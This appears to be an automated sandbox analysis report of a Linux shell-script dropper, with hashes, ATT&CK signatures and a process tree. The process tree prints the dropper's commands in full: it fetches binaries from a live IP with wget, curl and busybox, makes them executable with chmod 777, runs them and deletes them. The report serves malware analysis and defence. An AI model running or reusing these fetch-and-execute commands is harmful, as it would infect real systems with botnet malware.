Analysis
-
max time kernel
41s -
max time network
43s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20/11/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
-
Size
10KB
-
MD5
2867f6118ccdde38169e7da22f50cedd
-
SHA1
00951ed155bfbaa967281a3ea76774460f9bafae
-
SHA256
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a
-
SHA512
3d85eb875e6a34c4142b2ea8dbf99fc182da866c339a858454a7d5f2aadbd30e3b36d838bc9d46978d7857257142d5f8294a8c295f23ee0e01028f28ec95f536
-
SSDEEP
96:rXlpNrClcsAv5FGwoy2dy18A2y5N7wGS0ojRJlpNrClc92:bCABFGwo8bNx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 775 chmod 831 chmod 814 chmod 837 chmod 740 chmod 790 chmod 802 chmod 844 chmod 676 chmod 756 chmod 796 chmod 825 chmod 851 chmod 683 chmod 731 chmod 808 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok 677 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo 684 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P 733 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw 741 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 757 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in 791 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR 797 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss 803 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw 809 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE 815 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao 826 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf 832 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 838 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao 845 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf 852 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf -
Checks CPU configuration 1 TTPs 16 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 821 busybox 826 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao 845 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao 817 wget 820 curl 827 rm 840 wget 841 curl 842 busybox 846 rm -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw curl File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE curl File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao curl File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P curl File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw curl File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf curl File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao curl File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo curl File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 curl File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR curl File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf curl File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 curl File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok curl File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 curl File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in curl File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss curl
Processes
-
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh1⤵PID:643
-
/bin/rm/bin/rm bins.sh2⤵PID:645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:672
-
-
/bin/chmodchmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵
- Executes dropped EXE
PID:677
-
-
/bin/rmrm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok2⤵PID:678
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:682
-
-
/bin/chmodchmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo2⤵PID:685
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:686
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:687
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:726
-
-
/bin/chmodchmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P2⤵PID:734
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:739
-
-
/bin/chmodchmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:750
-
-
/bin/chmodchmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY52⤵PID:758
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:759
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:771
-
-
/bin/chmodchmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi02⤵PID:779
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:780
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:789
-
-
/bin/chmodchmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in2⤵PID:792
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:795
-
-
/bin/chmodchmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR2⤵PID:798
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:799
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:801
-
-
/bin/chmodchmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss2⤵PID:804
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:805
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:807
-
-
/bin/chmodchmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw2⤵PID:810
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:811
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:813
-
-
/bin/chmodchmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:826
-
-
/bin/rmrm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:830
-
-
/bin/chmodchmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:833
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵PID:834
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵PID:836
-
-
/bin/chmodchmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵PID:839
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:842
-
-
/bin/chmodchmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:845
-
-
/bin/rmrm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:847
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:850
-
-
/bin/chmodchmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf2⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e52⤵PID:854
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97